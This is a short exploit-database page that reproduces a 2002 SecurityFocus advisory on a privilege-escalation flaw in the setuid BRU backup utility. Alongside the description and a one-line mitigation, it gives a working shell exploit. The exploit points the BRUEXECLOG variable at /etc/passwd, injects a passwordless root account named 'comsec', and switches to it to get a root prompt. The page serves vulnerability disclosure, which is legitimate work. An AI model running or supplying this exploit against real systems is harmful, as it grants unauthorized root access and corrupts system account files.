header-logo
Suggest Exploit
vendor:
BRU, the Backup and Restore Utility
by:
SecurityFocus
7.2
CVSS
HIGH
Privilege Escalation
264
CWE
Product Name: BRU, the Backup and Restore Utility
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2002

BRU, the Backup and Restore Utility Vulnerability

A vulnerability exists in BRU, the Backup and Restore Utility, from Enhanced Software Technologies. By setting the value of the BRUEXECLOG environment variable, it is possible to an attack to alter and create files on the filesystem. As BRU is installed setuid, these files are owned by root. This vulnerability can be easily used by local users to obtain root privileges.

Mitigation:

Ensure that the BRUEXECLOG environment variable is not set.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/1321/info

A vulnerability exists in BRU, the Backup and Restore Utility, from Enhanced Software Technologies. By setting the value of the BRUEXECLOG environment variable, it is possible to an attack to alter and create files on the filesystem. As BRU is installed setuid, these files are owned by root. This vulnerability can be easily used by local users to obtain root privileges.

$ BRUEXECLOG=/etc/passwd
$ export BRUEXECLOG
$ bru -V '
> comsec::0:0::/:/bin/sh
> '
$ su comsec
#

Navigation

Suggest Exploit

Services By CQR